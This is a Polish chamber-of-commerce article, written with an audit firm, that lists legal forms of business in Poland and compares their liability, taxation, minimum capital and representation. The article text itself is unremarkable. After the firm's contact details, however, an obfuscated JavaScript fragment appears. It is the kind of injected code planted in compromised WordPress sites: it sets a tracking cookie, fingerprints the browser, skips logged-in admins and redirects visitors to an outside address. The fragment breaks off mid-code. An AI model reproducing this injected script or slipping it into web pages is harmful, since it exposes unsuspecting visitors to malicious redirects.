Wywiad z ekspertem – rodzaje prowadzonej działalności | Północna Izba Gospodarcza w Koszalinie

Rozpoczynamy cykl wywiadów dla Przedsiębiorców dotyczących korzystnych form działalności. W związku z dosyć rozległym tematem rozpoczynamy od podstawowego podziału działalności gospodarczych. Temat opisała specjalnie dla nas Pani dr Aneta Szadkowska z DEBET Audyt Finanse Sp. z o.o.

W kolejnym wpisie przedstawione zostaną różnice pomiędzy działalnością indywidualną a spółką. Co jest korzystniejsze? Jakie są niebezpieczeństwa? Wybór nie jest łatwy.

RODZAJE PROWADZONEJ DZIAŁALNOŚCI

W  Polce mamy następujące rodzaje form prowadzenia działalności:

 • Indywidualna działalność gospodarcza (samozatrudnienie),
 • Spółka cywilna,
 • Spółki handlowe: spółki kapitałowe (spółka z ograniczoną odpowiedzialnością oraz akcyjna) oraz spółki osobowe (spółka jawna, partnerska, komandytowa, komandytowo-akcyjna).

 

Poszczególne formy działalności różnią się m.in:

 • odpowiedzialnością za zobowiązania,
 • opodatkowaniem i rodzajem księgowości (i wynikającymi z tego obowiązkami),
 • minimalnym kapitałem potrzebnym do założenia firmy,
 • formą reprezentacji (czyli tym, kto może reprezentować firmę np. w sprawach urzędowych),
 • urzędem, do którego zgłaszasz działalności i załatwiasz sprawy związane z twoją firmą  (np. zgłaszanie zmian),
 • koszty założenia i prowadzenia działalności.

Działalność jednoosobowa (samozatrudnienie)

 • jest najprostszą formą prowadzania działalności
 • jest przeznaczona dla osób fizycznych
 • jest rejestrowana w Centralnej Ewidencji i Informacji o Działalności Gospodarczej (CEIDG), można ją zarejestrować przez internet
 • nie wymaga minimalnego kapitału
 • księgowość zależy od formy opodatkowania
  • przy opodatkowaniu na zasadach ogólnych (skala podatkowa i podatek liniowy) można prowadzić uproszczoną księgowość (Książka Przychodów i Rozchodów), ale tylko wtedy, gdy  w minionym roku przychody nie przekroczyły kwoty 2 000 000 euro
  • przy ryczałcie wymagana jest ewidencja ryczałtu
  • przy karcie podatkowej nie ma obowiązku prowadzenia księgowości
 • odpowiedzialność przedsiębiorcy całym swoim majątkiem za zobowiązania powstałe w wyniku prowadzenia działalności
 • nazwa przedsiębiorcy podana w CEIDG musi zawierać co najmniej imię i nazwisko wnioskodawcy – np. Jan Kowalski. Możliwe jest dodanie do firmy innych elementów,   np. określających profil działalności
 • przedsiębiorca ma wyłączne prawo do reprezentowania swojej działalności
 • przedsiębiorca jest podatnikiem PIT
 • przedsiębiorca może być podatnikiem VAT

Spółka cywilna

 • spółkę tworzy minimum dwóch wspólników (osoby fizyczne, osoby prawne lub jednostki organizacyjne mające zdolność prawną)
 • Każdy wspólnik posiada wpis do CEIDG,
 • Nie wymaga minimalnego kapitału
 • księgowość jest uproszczona, jeśli wspólnikami są osoby fizyczne a w minionym roku przychody nie przekroczyły kwoty 2 mln euro. W pozostałych przypadkach  spółka prowadzi pełną księgowość
 • Spółka nie ma osobowości prawnej. Podatnikami podatku dochodowego są wspólnicy Spółki
 • Reprezentuje Spółkę każdy wspólnik, chyba że umowa spółki przewiduje inne zasady
 • Za zobowiązania Spółki solidarnie odpowiadają wszyscy wspólnicy majątkiem spółki i majątkiem osobistym
 • Wspólnicy mają prawo do równego udziału w zyskach.

Spółka z ograniczoną odpowiedzialnością

 • Spółkę tworzy minimum jeden założyciel (osoba fizyczna, osoba prawna lub jednostka organizacyjna mająca zdolność prawną). Założycielem nie może być wyłącznie jednoosobowa spółka z ograniczoną odpowiedzialnością
 • Umowa Spółki zawierana jest w formie aktu notarialnego (akt założycielski dla jednoosobowej spółki z o.o.). Istnieje możliwość zarejestrowania spółki z ograniczoną odpowiedzialnością w sposób uproszczony (tzw. S24), czyli zawarcie umowy spółki bez formy aktu notarialnego przez internet
 • Nazwa spółki może być obrana dowolnie, ale musi zawierać określenie „spółka z ograniczoną odpowiedzialnością” lub „spółka z o.o.” lub „sp. z o.o.”
 • Spółka wpisana jest do Krajowego Rejestru Sądowego (KRS). Możliwa jest również rejestracja online w systemie S24
 • Kapitał zakładowy spółki to minimum 5 000 zł, a wartość udziału to minimum 50 zł
 • Spółka prowadzi pełną księgowość
 • Jest podatnikiem podatku dochodowego – 19% lub 9% (preferencyjny dla nowych firm), a dywidenda dla udziałowców opodatkowana jest według stawki 19%
 • Organami spółki są zgromadzenie wspólników, zarząd,  rada nadzorcza i/lub komisja rewizyjna albo oba te organy w przypadku spółek, w których kapitał zakładowy przewyższa kwotę 500 000 zł,  a wspólników jest więcej niż 25
 • Spółkę reprezentuje zarząd. Jeśli zarząd jest wieloosobowy, do skutecznej reprezentacji konieczne jest współdziałanie dwóch członków zarządu lub członka zarządu i prokurenta (umowa spółki może inaczej określić sposób reprezentacji). Zarząd może również ustanowić pełnomocnika
 • Za zobowiązania spółka odpowiada w pierwszej kolejności swoimi własnymi aktywami. Członkowie zarządu odpowiadają solidarnie za zobowiązania spółki całym swoim majątkiem
 • Wspólnicy mają prawo do udziału w zysku wynikającym z rocznego sprawozdania finansowego i przeznaczonym do podziału uchwałą zgromadzenia wspólników.  Zysk przypadający wspólnikom dzieli się w stosunku do udziałów

 

Spółka jawna

 • Minimum dwóch wspólników (osoby fizyczne, osoby prawne lub jednostki organizacyjne mające zdolność prawną)
 • Umowa w formie pisemnej, chyba że wkładem wspólnika jest: nieruchomość (wtedy akt notarialny) lub przedsiębiorstwo (umowa z podpisami notarialnie poświadczonymi)
 • Nazwa powinna zawierać nazwisko przynajmniej jednego wspólnika albo firmę, a także oznaczenie  „spółka jawna” lub  „sp. j.”
 • Spóła zarejestrowana jest w Krajowym Rejestrze Sądowym (KRS). Możliwa rejestracja online w systemie S24
 • Brak wymogu dotyczącego minimalnej kwoty kapitału zakładowego
 • Księgowość uproszczona, jeśli wspólnikami są osoby fizyczne a w minionym roku przychody nie przekroczyły 2 mln euro. Księgowość pełna w pozostałych przypadkach
 • Podatnikami podatku dochodowego są wspólnicy, spółka nie ma osobowości prawnej
 • Do reprezentowania spółki uprawniony jest każdy wspólnik, chyba że umowa spółki przewiduje inne zasady
 • Za zobowiązania spółki odpowiadają solidarnie wszyscy wspólnicy (obejmuje majątek spółki i majątki osobiste wspólników)
 • Wspólnicy mają prawo do równego udziału w zyskach, a także do żądania corocznie wypłaty odsetek w wysokości 5% od swojego udziału kapitałowego

Spółka komandytowa

 • Spółkę zawiązuje minimum dwóch wspólników (osoby fizyczne, osoby prawne lub jednostki organizacyjne mające zdolność prawną), w tym jeden komplementariusz (odpowiadający całym swoim majątkiem) i jeden komandytariusz (odpowiadający do określonej w umowie kwoty)
 • Umowa spółki w formie aktu notarialnego. Istnieje możliwość zarejestrowania spółki komandytowej w sposób uproszczony (tzw. S24), czyli zawarcie umowy spółki bez formy aktu notarialnego przez internet
 • Nazwa spółki powinna zawierać nazwisko albo pełną nazwę firmy przynajmniej jednego komplementariusza a także oznaczenie  „spółka komandytowa” lub  „sp. k.” Nazwa nie może zawierać nazwiska ani firmy komandytariusza
 • Spółka podlega wpisowi do Krajowego Rejestru Sądowego (KRS). Możliwa rejestracja online w systemie S24
 • Brak wymogu odnośnie minimalnego poziomu kapitału zakładowego
 • Księgowość pełna
 • Spółka nie ma osobowości prawnej. Podatnikami podatku dochodowego są wspólnicy
 • Brak organów spółki
 • Każdy komplementariusz może samodzielnie reprezentować spółkę. Każdy komandytariusz może reprezentować spółkę jako jej pełnomocnik
 • Za zobowiązania Spółka odpowiada w pierwszej kolejności swoimi własnymi aktywami. Co najmniej jeden komplementariusz odpowiada całym majątkiem. Co najmniej jeden komandytariusz odpowiada do określonej w umowie kwoty
 • Udział w zyskach każdego z komplementariuszy jest równy, bez względu na rodzaj i wartość wkładów, a udział każdego z komandytariuszy jest proporcjonalny do wkładu rzeczywiście wniesionego przez komandytariusza do spółki

Spółka komandytowo-akcyjna

 • Zakłada ją minimum dwóch wspólników (osoby fizyczne, osoby prawne lub jednostki organizacyjne mające zdolność prawną), w tym jeden komplementariusz (odpowiadający całym swoim majątkiem) i jeden akcjonariusz
 • Dokumentem założycielskim jest statut w formie aktu notarialnego
 • Nazwa spółki powinna zawierać nazwisko albo pełną nazwę firmy przynajmniej jednego komplementariusza, a także oznaczenie  „spółka komandytowo-akcyjna” lub  „S.K.A.” Nazwa nie może zawierać nazwiska ani firmy akcjonariusza
 • Spółka podlega wpisowi do Krajowego Rejestru Sądowego (KRS)
 • Kapitał zakładowy na poziomie minimalnym wynosi 50 000 zł, a wartość akcji to minimum 1 grosz
 • Spółka prowadzi pełną księgowość
 • Podatek dochodowy od osób prawnych – 19% lub 9% (preferencyjny dla nowych firm). Dodatkowo dywidenda opodatkowana według stawki 19%
 • Organami spółki są walne zgromadzenie, rada nadzorcza (jeśli w spółce jest więcej niż 25 akcjonariuszy)
 • Każdy komplementariusz może samodzielnie reprezentować spółkę. Każdy akcjonariusz może reprezentować spółkę jako jej pełnomocnik
 • Za zobowiązania spółka odpowiada w pierwszej kolejności swoimi własnymi aktywami. Komplementariusz odpowiada osobiście całym swoim majątkiem, solidarnie z pozostałymi komplementariuszami. Akcjonariusz nie odpowiada swoim majątkiem za zobowiązania spółki
 • Komplementariusze oraz akcjonariusze uczestniczą w zysku spółki proporcjonalnie do ich wkładów wniesionych do spółki.

 

W kolejnych artykułach Pani dr Aneta Szatkowska z Audyt Sp. z o.o. przedstawi różnice pomiędzy działalnością indywidualną a spółką. Co jest korzystniejsze? Jakie są niebezpieczeństwa?
Zapraszamy do śledzenia naszych artykułów.

Dane do firmy zrzeszonej w Północnej Izbie Gospodarczej:

DEBET Audyt Finanse Spółka z ograniczoną odpowiedzialnością
Wpis na listę firm audytorskich pod numerem 4199

ul. H. Modrzejewskiej 71A
75-728 Koszalin
tel./fax 94 314 32 92
biuro@audytfinanse.com 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m